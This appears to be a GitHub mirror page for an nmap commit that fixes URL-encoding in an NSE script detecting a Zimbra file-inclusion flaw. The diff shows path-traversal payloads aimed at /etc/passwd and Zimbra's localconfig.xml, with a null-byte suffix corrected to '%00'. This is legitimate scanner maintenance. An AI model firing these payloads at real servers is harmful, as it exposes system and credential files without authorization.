mirror of
https://github.com/nmap/nmap.git
synced 2026-08-04 06:40:48 +00:00
[NSE] Symbol '%' missing in the urls.
This commit is contained in:
parent
726b259b20
commit
7b43ab1ff6
1 changed files with 2 additions and 2 deletions
|
|
@ -87,8 +87,8 @@ This issue was patched in Zimbra 7.2.6.
|
|||
local file_long = "../../../../../../../../../etc/passwd"
|
||||
--local file_long = "../../../../../../../../../opt/zimbra/conf/localconfig.xml"
|
||||
|
||||
local url_short = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_short .. "00"
|
||||
local url_long = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_long .. "00"
|
||||
local url_short = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_short .. "%00"
|
||||
local url_long = "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx20TemplateMsg.js.zgz?v=091214175450&skin=" .. file_long .. "%00"
|
||||
|
||||
stdnse.print_debug(1, "Trying to detect if the server is vulnerable")
|
||||
stdnse.print_debug(1, "GET " .. uri .. escape(url_short))
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue